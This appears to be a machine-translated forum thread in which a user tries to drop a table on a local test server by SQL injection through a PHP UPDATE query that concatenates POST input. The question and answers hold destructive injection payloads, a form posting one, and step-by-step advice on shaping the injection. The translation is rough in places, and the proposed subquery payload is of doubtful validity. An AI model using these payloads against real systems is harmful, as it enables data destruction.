I am trying to drop the table on my Denver through SQL injection:

<form method="post" action="http://test1.ru/?menu=admin&sel=rules"> <input type="text" name="tx" value="'; DROP TABLE db_conabrul;"> <input type="submit" value="next"> </form>

As soon as I did not try, I can not delete the table. I test on Denver, the right to delete is . Displays just such an error:

 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE db_conabrul;' WHERE id = '1'' at line 1

Table does not pay. Through a direct request to pma everything is ok. But it is necessary through an injection . What am I doing wrong?

The request looks like this:

 $db->Query("UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'");
  • If this is really your local Denver - log in somewhere glued SQL query with your injection and see what is wrong with the syntax. - Nofate
  • 2
    after the injection, you need at least to comment on all of the following ('; DROP TABLE db_conabrul; \ - \ -) ​​so that the request does not fall apart. The location is not very standard for the substitution of anything at all. - etki
  • @Fike, your option '; DROP TABLE db_conabrul; - did not work. How do you need it at all? Tell me please. - ModaL
  • @Modal, give your SQL code. If you just need a classic example, then SELECT * FROM users WHERE login = ': placeholder'; i need your result, filthy machine '; DROP TABLE users; - should work. - etki
  • @Fike, do not plow. Look at the query here: >> $ db-> Query ("UPDATE db_conabrul SET rules = '". $ _ POST ["tx"]. "' WHERE id = '1'"); - ModaL

2 answers 2

 "UPDATE db_conabrul SET rules = '".$_POST["tx"]."' WHERE id = '1'" $_POST["tx"]=',id=(select IF((DROP TABLE db_conabrul)=1,1,1))),id='1

at the exit we have:

 UPDATE db_conabrul SET rules = '',id=(select IF((DROP TABLE db_conabrul)=1,1,1))), id='1' WHERE id = '1';

valid SQL query with subquery ... about validity is not test but where to dig .. I think it will be clear ....

If, even after such an example, it is not clear to you, then I advise you to read the literature first, according to MySQL for example ... and the fact that it does not work with copy-paste is most likely the case ... I just indicated the direction)

  1. Above you have already indicated that it is impossible to perform 2 requests in 1 line!
  2. Based on what is written above, you need to substitute valid data for the request rules = '' i.e. start injection with the VALID data for this query
  3. further "close" quotation
  4. further, fade in and insert an INJECTION query so that it is a subquery that it returns in real conditions, for example, as in my example (I don’t know what you can put in id) my injection will write (do) Set ID = 1, digit 1 it turns out to be a subquery with an injection (select IF ((DROP TABLE db_conabrul), 1.1)), this is how the idea works) where 1.1 is written - what the subquery returns ...
  5. I think in your case MYSQL will not allow to DELETE the table in which UPDATE is maintained. The table is broken (although not sure), try deleting the table to a friend.
  6. Think ... :)
  • @ ToRcH565, invalid. I do not know which way to dig, so I ask here .. - ModaL
  • Corrected the answer. - Vladimir Klykov

And what is "under the hood" $ db-> Query ()? If something like mysql_query () - then execute several queries at once does not work:

It sends you a unique query (that is, it is not supported ).

http://php.net/manual/en/function.mysql-query.php

  • eight
    @ModaL from where so much anger? - IVsevolod
  • @IVsevolod, off topic because the answers. I want to learn> <Maybe you know how to just drop a table through an injection of $ db-> Query ("UPDATE db_conabrul SET rules = '". $ _ POST ["tx"]. "' WHERE id = '1'" "); ? : D - ModaL
  • 3
    @ModaL may well be on the topic, because if the function is not able to perform 2 requests from the input row, then drop the table just the same and fail, because This will be the second request. In general, there have already been advised. > try to fulfill the request in the request, which is obtained by gluing , to identify errors and move in the right direction) - IVsevolod
  • @IVsevolod, how to understand "when gluing"? Not catching up :( - ModaL
  • 2
    @ModaL, you have a parameterized query $ db-> Query ("UPDATE db_conabrul SET rules = '". $ _ POST ["tx"]. "' WHERE id = '1'" "); The script will substitute there your fragment from tx . As a result, the query will go to the database, glued (concatenated, interpolated) from several lines. Those. try changing the code a bit: $ my_query = "UPDATE db_conabrul SET rules = '". $ _ POST ["tx"]. "' WHERE id = '1'" $ db-> Query ($ my_query); and see what ultimately is in $my_query (via echo , var_dump , whatever). Well, show us. - Nofate